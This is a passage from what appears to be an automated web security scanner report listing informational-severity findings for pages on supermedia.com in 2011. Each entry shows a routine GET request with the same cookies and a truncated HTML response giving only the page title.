Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:29:19 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Help | SuperMedia.com Advertising</title>



...[SNIP]...

27.64. https://www.supermedia.com/help/account-information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/account-information

Request

GET /help/account-information HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Account Information | SuperMedia.com Advertising</title>



...[SNIP]...

27.65. https://www.supermedia.com/help/account-information/sign-in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/account-information/sign-in

Request

GET /help/account-information/sign-in HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Sign In Help | SuperMedia.com Advertising</title>



...[SNIP]...

27.66. https://www.supermedia.com/help/business-listings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/business-listings

Request

GET /help/business-listings HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:39 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Business Listings | SuperMedia.com Advertising</title>



...[SNIP]...

27.67. https://www.supermedia.com/help/direct-mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/direct-mail

Request

GET /help/direct-mail HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help/online-stores
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762124|check#true#1296760324; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:36 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 25224


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Ddirect Mail</title>


<link type="text/css" rel="st
...[SNIP]...

27.68. https://www.supermedia.com/help/domains-email  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/domains-email

Request

GET /help/domains-email HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Domains and Email Help | SuperMedia.com Advertising</title>



...[SNIP]...

27.69. https://www.supermedia.com/help/local-search-marketing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/local-search-marketing

Request

GET /help/local-search-marketing HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing Help | SuperMedia.com Advertising</title>



...[SNIP]...

27.70. https://www.supermedia.com/help/online-stores  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/online-stores

Request

GET /help/online-stores HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=_c086BB48A-27A9-FE95-CA40-0000B767F5C1_kD178CD9B-A35A-5925-4EF5-B8443B54EAB4
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762116|check#true#1296760316; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 39876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Stores Help | SuperMedia.com Advertising</title>



...[SNIP]...

27.71. https://www.supermedia.com/help/search-marketing-services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/search-marketing-services

Request

GET /help/search-marketing-services HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Search Marketing Services Help | SuperMedia.com Advertising</title>



...[SNIP]...

27.72. https://www.supermedia.com/help/search-marketing-services/reporting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/search-marketing-services/reporting

Request

GET /help/search-marketing-services/reporting HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296764993|check#true#1296763193;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 20:29:45 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Search Engine Marketing Reporting | SuperMedia.com Advertising</title>



...[SNIP]...

27.73. https://www.supermedia.com/help/telephone-service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/telephone-service

Request

GET /help/telephone-service HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:52 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Telephone Service Help | SuperMedia.com Advertising</title>



...[SNIP]...

27.74. https://www.supermedia.com/help/terms-conditions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/terms-conditions

Request

GET /help/terms-conditions HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:09 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Terms and Conditions | SuperMedia.com Advertising</title>



...[SNIP]...

27.75. https://www.supermedia.com/help/web-hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/web-hosting

Request

GET /help/web-hosting HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:09 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Hosting Help | SuperMedia.com Advertising</title>



...[SNIP]...

27.76. https://www.supermedia.com/help/web-site-design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/web-site-design

Request

GET /help/web-site-design HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:54 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Design Help | SuperMedia.com Advertising</title>



...[SNIP]...

27.77. https://www.supermedia.com/help/yellow-pages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/yellow-pages

Request

GET /help/yellow-pages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Yellow Pages Help | SuperMedia.com Advertising</title>



...[SNIP]...

27.78. https://www.supermedia.com/local-search-marketing/do-it-yourself  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /local-search-marketing/do-it-yourself

Request

GET /local-search-marketing/do-it-yourself HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:09 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Do-it-yourself Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...

27.79. https://www.supermedia.com/local-search-marketing/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /local-search-marketing/services

Request

GET /local-search-marketing/services HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Search Marketing Services | SuperMedia.com Advertising</title>



...[SNIP]...

27.80. https://www.supermedia.com/marketing-success  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /marketing-success

Request

GET /marketing-success HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:10 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing Success | SuperMedia.com Advertising</title>



...[SNIP]...

27.81. https://www.supermedia.com/media-network/affiliate-program  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /media-network/affiliate-program

Request

GET /media-network/affiliate-program HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Affiliate Program | SuperMedia.com Advertising</title>



...[SNIP]...

27.82. https://www.supermedia.com/media-network/market-coverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /media-network/market-coverage

Request

GET /media-network/market-coverage HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:36 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Market Coverage| SuperMedia.com Advertising</title>



...[SNIP]...

27.83. https://www.supermedia.com/media-network/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /media-network/mobile

Request

GET /media-network/mobile HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Mobile Applications | SuperMedia.com Advertising</title>



...[SNIP]...

27.84. https://www.supermedia.com/media-network/online-ad-network  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /media-network/online-ad-network

Request

GET /media-network/online-ad-network HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia's Online Ad Network | SuperMedia.com Advertising</title>



...[SNIP]...

27.85. https://www.supermedia.com/media-network/our-brands  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /media-network/our-brands

Request

GET /media-network/our-brands HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Brands | SuperMedia.com Advertising</title>



...[SNIP]...

27.86. https://www.supermedia.com/media-network/sem-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /media-network/sem-partners

Request

GET /media-network/sem-partners HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia's Search Marketing Partners | SuperMedia.com Advertising</title>



...[SNIP]...

27.87. https://www.supermedia.com/national-agency-products/media-kit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /national-agency-products/media-kit

Request

GET /national-agency-products/media-kit HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Media Kit | SuperMedia.com Advertising</title>


<li
...[SNIP]...

27.88. https://www.supermedia.com/online-advertising  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /online-advertising

Request

GET /online-advertising HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
